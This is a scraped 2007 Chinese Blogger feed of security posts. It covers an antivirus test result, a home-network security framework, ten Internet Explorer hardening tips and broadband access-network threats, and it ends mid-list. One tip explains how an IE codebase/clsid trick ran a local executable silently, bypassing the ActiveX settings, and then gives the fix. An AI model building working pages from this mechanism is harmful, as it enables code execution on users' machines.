</tr></tbody></table> <h3>Symantec</h3> <table class="layout"><tbody><tr><td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE4">Symantec</a><br /><i>Product name</i>: Symantec AntiVirus 10.2.0.276</td></tr></tbody></table><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-2868416590249036943?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-90852337020860795152007-08-22T01:48:00.002-07:002007-08-22T01:49:03.913-07:00樂古電腦安全中心<span class="bold">樂古電腦安全中心<br /><br />==CHECK LINE==<br /></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-9085233702086079515?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-88560501411755375732007-08-22T01:48:00.001-07:002007-08-22T01:48:17.078-07:00家庭網絡安全框架<div style="font-size: 12px;"><span style="font-size: 12px;"><span style="color:black;"><b>摘要</b> </span><span style="color:black;"> 家庭網絡安全框架是指保護家庭網絡的安全服務框架。這種框架在家庭網絡、因特網、以及防火牆之間使用安全信道來确保家庭網關免受拒絕服務(DoS)的攻 擊。同時它還能夠對家庭内部無限局域網中的各種移動設備進行入侵檢測和訪問控制。本文提出了一種完整的安全管理框架來保護家庭網絡,使之免受内部或外部的 攻擊。 </span><br /><br /><span style="color:black;"><b>1、簡介</b> </span><br /><span style="color:black;"> 現在的家庭中,不僅有計算機而且還有其它信息設備組成的網絡。當這些信息設備與因特網連接時,它們很容易暴 露在多種攻擊之下。而用戶并不想因此洩漏他們的個人隐私。所以這些家庭網絡環境需要一個安全、可靠的解決方案。目前,雖然有很多家庭網絡安全産品,比如說 防火牆、虛拟個人網絡(Virtual Private Network(VPN))、安全無線局域網(wireless LAN security)等[1],但是還缺少一種綜合的安全解決方案來保護家庭網絡免受有線和無線攻擊。 </span><br /><br /><span style="color:black;"> 對于家庭網絡安全需求,我們主要考慮以下因素:(1)傳輸數據的安全。很多情況下,用戶需要從家庭外部使用 移動設備來控制家庭内部的設施;(2)對家庭網關的監測和控制;(3)對家庭内部無線局域網的訪問控制和入侵檢測;(4)用戶管理。基于以上因素,本文闡 述一個管理家庭網絡安全的解決方案。 </span><br /><br /><span style="color:black;"> 本文結構如下:第二節綜述安全管理框架;第三節闡述我們的家庭網關安全方案;第四節讨論本方案的實現方法;第五節總結本文并指出下一步研究工作。 </span><br /><br /><span style="color:black;"><b>2、綜述安全管理框架</b> </span><br /><span style="color:black;"> 爲滿足上述安全需求,我們設計并實現了一個家庭網絡安全框架。本框架是一個基于Open Service Gateway initiative(OSGi)[2]的家庭網絡中間件。OSGi爲家庭網絡定義了一個開放的共同體系結構,詳細定義了服務網關的标準。OSGi通過其 基礎系統來聯結各種中間件并支持各種接口。OSGi定了自己的安全服務,但是這些方法還有不足之處。本文使用在OSGi服務結構體系之上增加了4種家庭網 絡安全服務。</span><br /><br /><span style="color:black;"> 一是家庭網絡外的移動設備對家庭内的設施進行安全控制服務。二是通過對防火牆通的通信量的進行實時控制和監測來防止拒絕服務攻擊。三是無線局域網安全服務。通過使用家庭無線局域網來進行無線入侵檢測和移動設備的訪問控制。四是使用家庭設備進行用戶管理服務。 </span><br /><br /><span style="color:black;"><b>3、家庭網絡安全服務</b> </span><br /><span style="color:black;"> 3.1 家庭設備安全控制服務 </span><br /><span style="color:black;"> 從家庭外部網絡訪問和控制家庭設備時,控制請求必須通過因特網。但因特網并不是一個安全的區域。因此我們設計了一套針對家庭設施的安全控制服務。這個服務在移動設備和家庭網關之間建立了一個安全信道。</span><br /><br /><span style="color:black;">Type字段定義了信息包的類型。序列号(Sequence Number)和端口号(Port)用于防止MITM攻擊。Integrity用于檢查數據的完整性。操作程序如下:首先,客戶端向服務器端發送認證包。 服務器收到後,認證用戶。如果該用戶是注冊的用戶,服務器返回信息接受;否則拒絕。客戶端隻有在收到接受信息後才能繼續與服務器通信。 </span><br /><br /><span style="color:black;"> 經過以上程序,所有家庭網關和PDA之間傳輸的信息将通過SEED block cipher Algorithm加密。除加密外,所有加密數據附帶Integrity值以确保數據的完整性。我們使用MD5 hash算法計算Integrity值。 </span><br /><br /><span style="color:black;"> 3.2 基于傳輸狀态的防火牆 </span><br /><span style="color:black;"> 基于傳輸狀态的防火牆能夠檢測并控制網絡傳輸。它可以保護家庭網絡免受拒絕服務(Denial of Service(DoS))的攻擊,同時還可以拒絕或接收來自特定IP地址和端口号的數據。 </span><br /><br /><span style="color:black;"> 我們使用安全狀态圖表[4][5]檢測傳輸。基于這個原理,我們實現了一個傳輸檢測引擎。這個引擎由一個傳輸狀态信息收集器和安全策略管理器構成。 </span><br /><br /><span style="color:black;"> 傳輸狀态信息收集器以狀态單元(State Unit)的形式收集通信信息并使用統計方法對其進行分析。狀态單元包括傳輸模式和相應的統計信息。安全策略管理器通過使用安全狀态圖表建立安全策略。它 能反映所有出現在網絡上的通信狀态。安全狀态圖表根據傳輸的狀态轉移來相應地改變安全策略。過濾規則發生器将新的安全策略轉換成過濾規則。傳輸控制器使用 該規則控制傳輸。當狀态轉移信号發生器發送狀态轉移信息給狀态表時,代表傳輸狀态的S1狀态将檢測自身狀況,看是否能接受狀态轉移信号。這個引擎能有效進 行網絡安全管理以應對迅速變化的傳輸狀況。管理員可以保存并通過圖形界面分析傳輸信息和安全策略日志。基于傳輸狀态的防火牆根據家庭網關中的IP地址列表 來控制數據傳輸并能拒絕或允許來自用戶指定的特定IP地址和端口的信息包。 </span><br /><br /><span style="color:black;"> 3.3 無線局域網安全服務 </span><br /><span style="color:black;"> 無線局域網安全服務[6]具備入侵檢測[7]和訪問控制的能力。入侵檢測系統包括代理搜集和入侵檢測服務器。代理搜集監察和收集接入點信息以及通過無線網絡傳送數據的移動站點。收集到的數據傳送給檢測引擎并被轉換成審計數據的格式。 </span><br /><br /><span style="color:black;"> 我們使用802.11管理數據幀來監控無線網絡[8]。MAC數據幀收集器負責收集管理幀,然後信息提取器 負責提取狀态信息和統計信息。狀态信息用來表示站點和接入點的狀态。統計信息代表每一個信道的吞吐量和誤碼率,以及不同類型幀的數目和傳輸信息等。然後審 計數據發生器使用審計數據格式重建這些數據。審計數據包括7個字段。它們是MAC地址、當前狀态、請求計數、分離計數、非鑒定計數、當前序列号、序列号門 限等等。探測引擎通過唯一身份(Organizationally Unique Identifiers(OUI))列表匹配模塊和序列号分析模塊來檢測入侵。</span><br /><br /><span style="color:black;">在入侵者攻擊無線局域網之前,他們需要僞造MAC地址。IEEE已經分配6 278個前綴給硬件生産商用于指定網卡的MAC地址。通過比較OUIs和分配列表,我們能夠檢測到通過僞造随機的MAC地址前綴進行入侵的攻擊者。 IEEE推薦了一種通過使用數據幀排序來容納碎片地址的方法。序列控制字段中4 bits用于碎片地址,而12 bit用于序列号。序列号字段是一個序列計數器,每産生一個非碎片數據幀,序列計數器就會加一。它從0開始,按4 096取模。除非數據幀是一個大數據包的碎片,否則碎片計數總是0。黑客在破解802.11數據幀的時候并沒有辦法将這個參數設置成任意值。當模塊接收到 第一個管理數據幀時,它提取序列号并作爲臨時變量保存。然後模塊接收第二幀時,會與第一幀的序列号做比較。如果第二幀的序列号不大于第一幀的序列号,它将 認爲這是攻擊。管理員能監測每個站點和接入點的狀态。它能注冊信任的接入點并使用MAC地址過濾器來管理那些家庭使用無線局域網資源的站點。 </span><br /><br /><span style="color:black;"> 3.4 用戶管理服務 </span><br /><span style="color:black;"> 用戶管理服務向用戶提供認證和授權。我們使用基于以角色爲訪問控制模型[9](RBAC)來實現,RBAC 模型通過分配角色給訪問權限和用戶來簡化授權管理;不是根據用戶來确定訪問權限,用戶和許可都被賦予一個角色,用戶的許可權既是被賦予的角色的許可權。每 個家庭網絡用戶都會分配一個角色,例如用父親來代表管理員,孩子以及訪客。管理員能夠向訪客或孩子分配控制家庭設施和網絡資源的權限。每個希望從外部訪問 家庭網絡的用戶必須有ID和口令。管理員通過使用綜合管理界面來向每個用戶分配使用家庭設施的權限。 </span><br /><br /><span style="color:black;"><b>4、實驗</b> </span><br /><span style="color:black;"> 我們在Redhad Linux 9.0上實現了家庭網絡安全管理構架。這個框架使用了Java Embedded Server(JES)[10]2.0,JES是基于OSGi的。我們使用Microsoft embedded Visual C++ 3.0實現PDA客戶機程序用于設置安全信道并控制家庭設備。基于傳輸的防火牆與IP列表相連來控制網絡通信。管理員能安裝并運行以上這些安全服務。 </span><br /><br /><span style="color:black;"> 家庭網絡使用的整個狀态圖:管理和控制用戶和設備</span><br /><br /><span style="color:black;"><b>5、結論</b> </span><br /><span style="color:black;"> 在本文中,我們設計和使用了家庭網絡安全管理框架。所使用的安全機制是、基于OSGi服務框架。這個框架的 中心是綜合有線和無線安全機制來保護家庭網絡免受有線或無線的攻擊。爲達到這個目的,我們設計了一個新的服務協議來安全控制家庭設備、基于傳輸的防火牆、 無線局域網安全、管理服務等等并使之綜合成一個解決方案。</span></span></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-8856050141175537573?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-16848719598407856162007-08-22T01:47:00.004-07:002007-08-22T01:48:02.732-07:00十種反黑技巧<div style="font-size: 12px;"><span style="font-size: 12px;"><span style="color:black;">針對IE的惡意修改、攻擊方法非常多,本文中介紹的十種反黑技巧,一定會對你有所幫助。 </span><br /><span style="color:black;"><b>1.管理好Cookie</b> </span><br /><span style="color:black;">在IE6.0中,打開“工具”→“Internet選項”→“隐私”對話框,這裏設定了“阻止所有 Cookie”、“高”、“中高”、“中”、“低”、“接受所有Cookie”六個級别(默認爲“中”),你隻要拖動滑塊就可以方便地進行設定,而點擊下 方的“編輯”按鈕,在“網站地址”中輸入特定的網址,就可以将其設定爲允許或拒絕它們使用Cookie。</span><br /><br /><span style="color:black;">2.禁用或限制使用Java程序及ActiveX控件 </span><br /><span style="color:black;">在網頁中經常使用Java、Java Applet、ActiveX編寫的腳本,它們可能會獲取你的用戶标識、IP地址,乃至口令,甚至會在你的機器上安裝某些程序或進行其他操作,因此應對 Java、Java小程序腳本、ActiveX控件和插件的使用進行限制。打開“Internet選項”→“安全”→“自定義級别”,就可以設置 “ActiveX控件和插件”、“Java”、“腳本”、“下載”、“用戶驗證”以及其它安全選項。對于一些不太安全的控件或插件以及下載操作,應該予以 禁止、限制,至少要進行提示。 </span><br /><br /><span style="color:black;"><b>3.防止洩露自己的信息</b> </span><br /><span style="color:black;">缺省條件下,用戶在第一次使用Web地址、表單、表單的用戶名和密碼後,同意保存密碼,在下一次再進入同樣的 Web頁及輸入密碼時,隻需輸入開頭部分,後面的就會自動完成,給用戶帶來了方便,但同時也留下了安全隐患,不過我們可以通過調整“自動完成”功能的設置 來解決。設置方法如下:依次點擊“Internet選項”→“内容”→“自動完成”,打開“自動完成設置”對話框,選中要使用的“自動完成”複選項。 </span><br /><br /><span style="color:black;">提醒:爲發安全起見,防止洩露自己的一些信息,應該定期清除曆史記錄,方法是在“自動完成設置”對話框中點擊“清除表單”和“清除密碼”按鈕。 </span><br /><br /><span style="color:black;"><b>4.清除已浏覽過的網址</b> </span><br /><span style="color:black;">在“Internet選項”對話框中的“常規”标簽下單擊曆史記錄區域的“清除曆史記錄”按鈕即可。若隻想清除部分記錄,單擊IE工具欄上的“曆史”按鈕,在左欄的地址曆史記錄中,找到希望清除的地址或其下網頁,單擊鼠标右鍵,從彈出的快捷菜單中選取“删除”。 </span><br /><br /><span style="color:black;"><b>5.清除已訪問過的網頁</b> </span><br /><span style="color:black;">爲了加快浏覽速度,IE會自動把你浏覽過的網頁保存在緩存文件夾“C:/Windows/Temporary Internet Files”下。當你确認不再需要浏覽過的網頁時,在此選中所有網頁,删除即可。或者在“Internet選項”的“常規”标簽下單擊“Internet 臨時文件”項目中的“删除文件”按鈕,在打開的“删除文件”對話框中選中“删除所有脫機内容”,單擊“确定”,這種方法會遺留少許Cookie在文件夾 内,爲此IE6.0在“删除文件”按鈕旁邊增加了一個“删除Cookie”的按鈕,通過它可以很方便地删除遺留的。</span><br /><br /><span style="color:black;"><b>6.永遠不怕IE主頁地址被修改</b> </span><br /><span style="color:black;">衆所周知,修改IE默認主頁地址是惡意網頁常用的一招。IE被修改後,會自動連接到惡意網頁的地址。大家常用的方法是修改注冊表,其實,隻要簡單給IE加個參數,就再也不害翴E主頁地址被修改了。下面是具體的方法和步驟。 </span><br /><br /><span style="color:black;">首先,打開“我的電腦”,找到IE的安裝目錄,這裏假設你的IE安裝在C:/Program FilesInternet Explorer下。進入該文件夾,找到Iexplore.exe文件,對着它點擊鼠标右鍵,在彈出的快捷菜單中選擇“發送到→桌面快捷方式”,這樣就在 桌面上建立了一個Iexplore.exe文件的快捷方式。如果你夠仔細的話,你會發現你建立的這個快捷方式名字爲“Iexplore.exe”,而桌面 上原來的IE快捷方式名字爲“Internet Explorer”,兩者不僅名字不相同,而且“内涵”也不盡相同。 </span><br /><br /><span style="color:black;">繼續我們的工作,用鼠标右鍵單擊該快捷方式,選擇“屬性”,會彈出“Iexplore.exe 屬性”對話框,選擇其中的“快捷方式”标簽,然後在“目标”框裏填入:"C:/Program Files/Internet Explorer/IEXPLORE.EXE" -nohome,給Iexplore.exe加上參數“-nohome”,輸入時請大家注意在參數“-nohome”前面有一個空格,不要忘了,輸入完 畢。點擊“确定”退出即可。 </span><br /><br /><span style="color:black;">這樣即使主頁被修改也沒有關系,打開IE就是一片空白,就連about:blank也不顯示。而且這樣能夠加快啓動速度,一點IE窗口馬上就出蹦來了。 </span><br /><br /><span style="color:black;">對于IE在安裝時自己建立的快捷方式,我們無法爲它加上上述參數。如果不信可以試試,用鼠标右鍵點擊桌面上原來 IE自建的快捷方式,選“屬性”,會發現“目标”欄、“起始位置”欄、“快捷鍵”欄和“運行方式”欄都是灰色不可選取狀态。這就是它們之間最大的不同!也 是本文的關鍵所在。 </span><br /><br /><span style="color:black;"><b>7.挖出IE本地安全配置選項</b> </span><br /><span style="color:black;">在IE中可以通過點擊“工具→Internet選項→安全”來設定電腦安全等級,之後會出現。從圖中可以看出, 在安全性設定中我們隻能設定Internet、本地Intranet、受信任的站點、受限制的站點。不過,慣于隐藏其部分功能的微軟(真不知微軟是怎麽想 的,老和我們玩“捉迷藏”遊戲<img src="http://www.nakuz.com/images/smilies/cry.gif" smilieid="4" alt="" border="0" />,在這裏又留了一手:其實這裏還有一個隐藏的選項——就是“我的電腦”的安全性設定,如果你想看到它,可以通過修改注冊表的方法來達到目的。 </span><br /><br /><span style="color:black;">下面是具體的方法:</span><br /><span style="color:black;">打開“開始”菜單中的“運行”,在彈出的“運行”對話框中輸入Regedit.exe,打開注冊表編輯器,點擊 前面的“+”号順次展開到:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion \Internet SettingsZones,在右邊窗口中找到DWORD值“Flags”,默認鍵值爲十六進制的21(十進制33),雙擊“Flags”,在彈出的對話 框中将它的鍵值改爲“1”即可,關閉注冊表編輯器。無需重新啓動電腦,重新打開IE,再次點擊“工具→Internet選項→安全”标簽,你就會看到多了 一個“我的電腦”,在這裏你可以對IE的本地安全進行配置。 </span><br /><br /><br /><span style="color:black;">這個小技巧有什麽用呢?把下面的代碼保存爲一個html文件,然後運行試試就知道了: </span><br /><br /><span style="color:black;">運行上面的html文件,會打開你的計算機中c:/winnt/system32文件夾下的calc.exe文 件!而且IE沒有任何提示!即使在IE的安全設置中禁用ActiveX控件上述代碼也能工作!如果不是calc.exe文件而是其他惡意文件又會怎麽樣? 如果是在你浏覽的網頁中含有類似上面的代碼又會怎麽樣?真危險啊! </span><br /><br /><span style="color:black;">之所以會這樣是由于IE存在兩個可怕的漏洞:可本地執行任意命令,IE的ActiveX安全設置可被繞過。在上 述代碼中我們給IE指定了一個系統中并不存在的控件号("clsid:88888888-8888-8888-8888-888888888888), IE會試圖從codebase指定的地址去下載并安裝改控件。根據codebase于是IE找到了c: /winnt/system32/calc.exe,接着IE開始“下載”并安裝該程序。由于calc.exe是EXE文件,這樣就等于是在運行該文件, 所以calc.exe就被運行了! </span><br /><br /><span style="color:black;">那麽爲什麽IE在“下載安裝控件”過程中不提示用戶,也不應用IE安全設置中的限定進行檢測呢?這就是IE的 ActiveX安全設置可被繞過漏洞造成的!其主要原因是IE安全設置都是針對非本地的頁面或交互的,對于本地的安全設置IE是最大信任的。如果你注意看 IE的安全設置,都是對Internet和Intranet上WEB服務器而言的,根本就沒有對本地文件的安全設置。概括說來就是IE對本地安全采用最大 信任原則。 </span><br /><br /><span style="color:black;">解決的辦法就是我們在開始說的那個技巧:挖出挖出IE本地安全配置選項,即修改IE安全設置中有關“我的電腦”的設置,選定後,禁用ActiveX下載就萬事大吉了。 </span><br /><br /><span style="color:black;"><b>8.在DOS下打開“Internet屬性”窗口</b> </span><br /><span style="color:black;">有時在浏覽了某些惡意網頁後,會導緻IE的“Internet屬性”對話框無法打開,這時我們可以在DOS窗口 下輸入:RunDll32.exe shell32.dll,Control_RunDLL inetcpl.cpl命令,就可打開IE的“Internet屬性”對話框。要注意“Control_RunDLL”的大小寫以及它前面的逗号(,)不 要忘記了。RunDll32.exe是Windows動态鏈接庫(DLL)管理工具,可以用來在命令行下執行動态鏈接庫中的某個函數(或者功能模塊<img src="http://www.nakuz.com/images/smilies/cry.gif" smilieid="4" alt="" border="0" />。 </span><br /><br /><span style="color:black;">RunDll32的使用方法如下:RunDll32.EXE ,要注意以下幾點: </span><br /><span style="color:black;">(1)Dllname(就是制定DLL動态鏈接庫所在位置和文件名)直接不能有空格; </span><br /><span style="color:black;">(2)Dllname和entrypoint兩者之間隻能以“,”(逗号<img src="http://www.nakuz.com/images/smilies/cry.gif" smilieid="4" alt="" border="0" />分隔,逗号之後不能有空格,如果這裏出錯的話,你不會得到任何提示; </span><br /><span style="color:black;">(3)optional arguments動态鏈接庫調用參數,這個參數對大小寫是很敏感的,注意不要寫錯。 </span><br /><br /><span style="color:black;"><b>9.解除IE的分級審查口令</b> </span><br /><span style="color:black;">有些時候,我們的IE會被人修改爲設有分級審查口令,一旦被設置了分級審查口令,即使重新安裝IE也是沒有用的。怎麽辦呢?難道要格式化硬盤?千萬不要!這裏我有一個好辦法,幫您解決這個問題。 </span><br /><br /><span style="color:black;">進入注冊表,找到HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersionpolicies\Ratings,這裏有一個名爲“key”的主鍵,這就是您設置的分級審查口令,直接将 它删除即可。重新啓動之後,點擊“工具”→“Internet選項”→“内容”→“分級審查”,您會發現分級審查口令已經被複位了。現在您隻要輸入新的分 級審查口令即可。 </span><br /><br /><span style="color:black;">如果你用的是Windows 9x則更簡單了,到C:\Windows\system目錄裏找到rating.pol文件,要注意這是一個隐藏文件,直接将它删除就可以解決問題了。</span><br /><br /><span style="color:black;"><b>10. 預防網頁惡意代碼</b> </span><br /><span style="color:black;">許多惡意網頁爲防止有人查看其代碼内容,采取了各種各樣的方法求防止我們查看其源代碼。然而,他們的一切努力也 許都是白費心機。因爲用如下的方法可以輕易地查看其源代碼。隻要在IE地址欄中輸入View-Source:URL即可。舉個例子,你想查看搜狐網站 hxxp://www.juntuan.net的源代碼,隻要在IE地址欄中輸入:View-Source:hxxp: //www.juntuan.net,稍等一下就會彈出一個窗口,裏面就是你想看到的網頁源代碼。趕快仔細看看,裏面是否有更改注冊表或暗中下載文件的惡 意代碼,如果有那就别進該網頁了,很簡單吧?這樣做不僅可以學到别人的網頁制作技術,更可以事先預防惡意代碼,一舉兩得!</span></span></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-1684871959840785616?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-68052806626830389992007-08-22T01:47:00.003-07:002007-08-22T01:47:33.337-07:00寬帶接入安全性問題<div style="font-size: 12px;"><span style="font-size: 12px;"><span style="color:black;">最 近10年,寬帶接入網絡在全球蓬勃發展,越來越多的個人用戶和企業用戶通過寬帶接入到Internet。同時,用戶對網絡性能的要求也越來越高,他們不再 滿足于暢通無阻的高帶寬接入能力,逐漸對服務的質量提出了更高的要求。在服務質量(QoS)中,一個重要的不能忽視的指标就是安全保證。</span><br /><br /><span style="color:black;"> <b>1.寬帶接入安全性問題</b></span><br /><span style="color:black;"> 寬帶接入網絡的快速發展使得寬帶用戶數成倍增加,但是也使得網絡遭受安全攻擊的可能性大大增加。特别是引入以太網技術、IP技術後,接入網安全性問題日益 凸現。因爲以太網絡是共享式的網絡,它的優點和缺點均很明顯。當前網絡上很多黑客工具可以用來在以太網上興風作浪:監聽他人信息、盜取業務、發起拒絕服務 (DOS)攻擊[1],造成網絡設備癱瘓。IP網絡因爲曆史原因,最初在安全性方面的設計考慮不多。IP網絡上的業務大都通過智能終端來完成,處于運營商 控制範圍内的中間設備主要的功能就是交換,運營商對業務很難控制,這就爲惡意用戶提供了開展破壞活動的空間。</span><br /><br /><span style="color:black;"> 爲提供“電信運營級”的接入網絡,爲用戶提供安全的接入服務,檢測非法業務,保證網絡設備正常運行,目前是設備提供商和電信運營商共同關注的問題[2-3]。</span><br /><br /><span style="color:black;"> 目前,寬帶接入技術呈現多樣化趨勢,包括數字用戶線(DSL)、混合光纖/同軸電纜(HFC)、無源光網絡(PON)和WiMax無線接入等,他們都具有如圖1所示的網絡架構:</span><br /><br /><span style="color:black;"> 寬帶接入網絡的架構包括以下幾個組成部分:</span><br /><br /><span style="color:black;"> (1)用戶自組網絡</span><br /><span style="color:black;"> 用戶自組網絡是以家庭網關爲核心組成的局部網絡,這個網絡物理上歸屬于用戶。DSL是當前最普遍的用戶接入方式。</span><br /><br /><span style="color:black;"> (2)接入節點</span><br /><span style="color:black;"> 接入節點完成用戶線纜的物理終結,或者無線信道的終結,實現用戶數據的彙聚,滿足高密度、多形式的接入。接入節點最靠近用戶,是運營商網絡的邊緣,是安全防護的第一道門檻。在接入網安全問題中,接入節點處于重要的地位。</span><br /><br /><span style="color:black;"> (3)以太網彙聚網絡</span><br /><span style="color:black;"> 因爲性價比突出,以太網受到運營商的青睐。進一步,以太網同時也肩負彙聚數據和網絡内部數據交換的任務。</span><br /><br /><span style="color:black;"> (4)寬帶網絡網關</span><br /><span style="color:black;"> 寬帶網絡網關包括很多功能:終結以太層及其對應的封裝、用戶認證(結合認證服務器)、用戶端自動配置、QoS業務保證等。物理上,寬帶網絡網關可以是一個 設備,也可以是多個設備,執行寬帶接入遠程服務器、動态主機配置協議(DHCP)服務器(或DHCP中繼器)和路由器的功能。</span><br /><br /><span style="color:black;">接入節點、以太彙聚網絡和寬帶網絡網關屬于運營商所有,這些設備或者網絡對運營商而言都是可信的。用戶自組網絡 歸用戶自己所有和使用。對運營商而言,用戶自組網絡是不可信的。安全威脅大都來自不可信網絡内惡意用戶或者程序的攻擊。當然,有時安全問題也産生于可信任 域内,比如因爲設備不穩定等原因産生的安全問題。但安全問題主要還是來自不可信域對可信任域的安全威脅。</span><br /><br /><span style="color:black;"> 歸納起來,接入網絡中主要有下面的一些安全問題:</span><br /><span style="color:black;"> (1)非法用戶的接入。</span><br /><span style="color:black;"> (2)非法報文和惡意報文發送。</span><br /><span style="color:black;"> (3)通過媒體訪問控制(MAC)/IP地址欺騙,如冒用MAC地址或者IP地址,偷取他人的業務服務或者造成DOS攻擊。</span><br /><span style="color:black;"> (4)非法業務,如開展非法的IP語音(VoIP)業務、私拉亂接用戶等。</span><br /><span style="color:black;"> 下面依次對上述問題以及與其相對應的解決方案展開論述。</span><br /><br /><span style="color:black;"> <b>2.非法用戶接入</b></span><br /><span style="color:black;"> 非法用戶接入性質嚴重,直接影響運營商的運營收益。如果不對用戶進行識别和認證,那麽非法用戶接入就會大量存在。</span><br /><br /><span style="color:black;"> 用戶識别與認證技術已經非常的成熟,基于以太網的點到點協議(PPPoE)、DHCP+Web和802.1x協議等已經被普遍使用。當前,業界關注的問題 是:對用戶端口(也稱爲用戶線路)的識别。在零售模式下,每個用戶在接入節點處都有一個邏輯端口,有線環境下是硬端口,無線環境下是一個軟端口。如果認證 服務器隻是通過用戶名來識别用戶,那麽用戶可以把自己的用戶名和密碼共享給其他用戶,其他用戶也能通過這一邏輯端口上網,這是運營商不希望看到的,會造成 運營商的運營收入的減少。</span><br /><br /><span style="color:black;"> 在基于ATM的點到點協議(PPPoA)爲主要接入方式時,用戶虛通道(VC)在寬帶接入遠程服務器(BRAS)上終結,因此,用戶的端口信息直接就可以 在BRAS上獲取。現在,PPPoE和IPoA是主要的接入方式。在這兩種接入方式下,物理上,用戶線路在接入節點處就被終結;VC信息要麽在接入節點處 終結,要麽根本沒有,因此BRAS沒有辦法直接獲取用戶的端口信息。所以,必須有一套有效的機制能夠将接入節點處的用戶端口信息傳遞給BRAS。當前,有 多種用戶端口(或者用戶線路)識别方案被提出來:</span><br /><br /><span style="color:black;">(1)DHCP option82協議</span><br /><span style="color:black;"> DHCP Option82(RFC3046)協議在DHCP(RFC2131)的基礎上,對協議流程進行了擴充。接入節點需要截獲DHCP上下行協議報文,扮演二 層DHCP中繼代理的角色。上行方向,将端口信息(也就是uPortID)插入到協議的Option82字段中;下行方向,剝離此字段信息(可選<img src="http://www.nakuz.com/images/smilies/cry.gif" smilieid="4" alt="" border="0" />。圖2爲協議交互示意圖。</span><br /><br /><span style="color:black;"> (2)PPPoE+協議</span><br /><span style="color:black;"> PPPoE+協議又稱爲<img src="http://www.nakuz.com/images/smilies/titter.gif" smilieid="9" alt="" border="0" />PPoE中間代理。和DHCP Option82類似,它對PPPoE協議報文進行了擴充。接入節點截獲PPPoE搜索階段的協議報文,在上行方向插入端口信息。圖3爲<img src="http://www.nakuz.com/images/smilies/titter.gif" smilieid="9" alt="" border="0" />PPoE+協議交互示意圖。</span><br /><br /><span style="color:black;"> (3)VBAS協議</span><br /><span style="color:black;"> VBAS協議和PPPoE+略有不同,VBAS協議修改PPPoE的流程,在用戶與BRAS協議交互中,插入BRAS與接入節點的交互,獲取端口信息。圖4爲VBAS協議交互示意圖。</span><br /><br /><span style="color:black;"> (4)虛拟局域網棧</span><br /><span style="color:black;"> 虛拟局域網棧(VLAN Stacking)采用雙标簽(Tag),使用内層VLAN來唯一标識用戶端口信息。</span><br /><br /><span style="color:black;"> (5)虛拟MAC</span><br /><span style="color:black;"> 虛拟媒體訪問控制(VMAC)對每個用戶數據報文的源MAC地址按照特定規則進行翻譯,翻譯後的MAC地址包含了用戶端口信息。這樣BRAS在PPPoE協議交互時,就可以直接從源MAC地址信息中獲取用戶端口信息。</span><br /><br /><span style="color:black;"> 各種用戶端口識别方案的優缺點如表1所示。</span><br /><br /><span style="color:black;"> <b>3.非法報文和過量報文</b></span><br /><span style="color:black;"> 上行方向,因爲用戶自組網絡不受控,惡意用戶或者惡意程序就可構造非法協議報文,向上發送,這不僅會導緻網絡設備處理性能下降,有時還造成網絡設備系統紊 亂甚至死機。另外,如果惡意用戶或者程序過量地上行發送協議、廣播報文,無論是合法還是非法,同樣會造成系統設備性能明顯下降,因爲協議、廣播等報文的處 理非常消耗設備資源。</span><br /><br /><span style="color:black;"> 下行方向,盡管處于可控的網絡域内,但是因爲設備自身穩定性問題,以及網絡複雜性問題,也可能會出現非法或者過量報文發送,也需要進行防範。</span><br /><span style="color:black;"> 非法報文包括:</span><br /><span style="color:black;"> (1)非法源MAC地址報文。源MAC地址不能是廣播或者組播地址,因爲有些MAC地址已經被标準組織所預留,不能被普通用戶使用。</span><br /><br /><span style="color:black;"> (2)非法協議報文。從理論上分析,互聯網組管理協議(IGMP)上行方向不可能有詢問(Query)報文,下行方向不可能有報告/離開/加入 (Report/Leave/Join)報文;DHCP協議上行不可能出現提供/确認(OFFER/ACK)報文,下行不可能出現發現/請求 (DISCOVER/REQUEST)報文;PPPoE協議上行不會有PADO和PADS報文,下行不會有PADI和PADR報文。根據需要,對這些報文 都要攔截過濾。</span><br /><br /><span style="color:black;">3)超長報文、超短報文或者校驗錯報文,如低于64字節的報文或者大于1 518字節的報文。特定情況下,超長報文是允許的。</span><br /><span style="color:black;"> 對于非法報文,一般的技術是使用過濾器來過濾丢棄這些報文。過濾器的基本原理是,根據用戶定義的被過濾數據報文的特征,匹配數據報文。如果符合預定義的特 征,那麽過濾掉該報文。當前的交換芯片大都具備報文特征提取和匹配功能,可以完成數據鏈路層、網絡層甚至更高層數據報文特征信息的提取和匹配。</span><br /><span style="color:black;"> 過量報文類型一般分成以下幾類:</span><br /><span style="color:black;"> 過量的協議報文</span><br /><span style="color:black;"> 過量的廣播報文</span><br /><span style="color:black;"> 過量的組播報文</span><br /><span style="color:black;"> 過量不同源MAC地址的報文</span><br /><span style="color:black;"> 前面3種過量報文會大量吞噬設備處理資源,第4種會占用交換芯片有限的MAC地址表資源,都需要進行控制。</span><br /><span style="color:black;"> 